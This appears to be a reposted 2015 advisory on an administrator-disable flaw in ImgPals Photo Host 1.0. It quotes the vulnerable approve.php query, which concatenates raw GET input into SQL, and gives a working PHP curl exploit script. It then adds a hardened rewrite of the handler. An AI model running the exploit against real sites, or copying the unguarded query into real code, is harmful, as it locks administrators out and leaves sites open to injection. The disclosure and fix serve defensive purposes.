
ImgPals Photo Host Version 1.0: Administrator Account Disable Flaw and Fix

Source: 自学PHP网    Date: 2015-04-17 13:03

ImgPals Photo Host Version 1.0 STABLE
Author: Corrado Liotta aka CorryL
Application: ImgPals Photo Host
Affected version: 1.0 STABLE
Developer site: http://www.imgpals.com/forum/
Platforms: Windows\Linux\Unix
...::[ Overview ]::..
I released the ImgPals Photo Host Version 1.0 STABLE
Features Include:
    * Easy Install
    * Full README file included
    * Full Control Panel to control your site
    * User Side Features
          o Multiple JQuery Uploads
          o Create and Edit Photo Albums
          o Make Albums Public or Private
          o Describe Albums and Photos
          o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
          o Add Friends
          o Chat with Friends
          o Update people with status wall posting
          o Manage Profile
          o Profile Avatar Uploads
          o Private Messaging
    * And much more, be sure to check out the Demo
...::[ Vulnerability ]::..
An attacker can remotely disable the administrator account,
preventing the administrator from accessing the site.
...::[ Proof ]::..
 // Excerpt from approve.php: $_GET['u'] is concatenated into the query as-is
 if ($_GET['a'] == 'app0'){
     $sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'");
 }
By sending the request approve.php?u=1&a=app0, an attacker can
disable the Administrator account.
...::[ Exploit ]::..
#!/usr/bin/php -f
<?php
//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on
$target = $argv[1]; // host name of the server
$power = $argv[2];  // app0 or app1
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Single GET to approve.php; u=1 is the member id used for the Administrator account
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
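
The approve.php logic from the Proof section, rewritten as a hardened handler. This is an added example, not ImgPals code and not the advisory author's: the function name handle_approval(), the session keys user_id / is_admin / csrf and the POST field csrf are assumptions, while the members table, its id / approved columns and the app0 / app1 actions come from the page.

```php
<?php
declare(strict_types=1);

// Added example, not ImgPals code. Hypothetical names: handle_approval(),
// the session keys user_id / is_admin / csrf, and the POST field "csrf".
// From the page: table members, columns id / approved, actions app0 / app1.
function handle_approval(PDO $db, array $session, string $method, array $post): int
{
    // State changes only via POST, so a plain link or image tag cannot trigger them.
    if ($method !== 'POST') {
        return 405;
    }
    // The caller must be a logged-in administrator.
    if (empty($session['user_id']) || empty($session['is_admin'])) {
        return 403;
    }
    // Per-session CSRF token, compared in constant time.
    $sent = $post['csrf'] ?? null;
    $want = $session['csrf'] ?? null;
    if (!is_string($sent) || !is_string($want) || !hash_equals($want, $sent)) {
        return 403;
    }
    // Allow-list the action and require a positive integer member id.
    $actions = ['app0' => 0, 'app1' => 1];
    $action  = $post['a'] ?? null;
    $id      = filter_var($post['u'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if (!is_string($action) || !isset($actions[$action]) || $id === false) {
        return 400;
    }
    // Bound parameters instead of concatenating request input into the SQL string.
    $stmt = $db->prepare('UPDATE members SET approved = :approved WHERE id = :id');
    $stmt->execute([':approved' => $actions[$action], ':id' => $id]);
    return 200;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, approved INTEGER)');
$db->exec('INSERT INTO members VALUES (1, 1), (2, 1)');

$admin = ['user_id' => 1, 'is_admin' => true, 'csrf' => 'constructed-token'];
$req   = ['u' => '2', 'a' => 'app0', 'csrf' => 'constructed-token'];

var_dump(handle_approval($db, [], 'GET', $req));                       // anonymous GET, as in the advisory
var_dump(handle_approval($db, [], 'POST', $req));                      // anonymous POST
var_dump(handle_approval($db, $admin, 'POST', ['u' => 'abc'] + $req)); // admin, malformed member id
var_dump(handle_approval($db, $admin, 'POST', $req));                  // admin, valid request
```

In approve.php itself the call would be http_response_code(handle_approval($db, $_SESSION, $_SERVER['REQUEST_METHOD'], $_POST)) after session_start(), with $db pointing at the site's own database.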
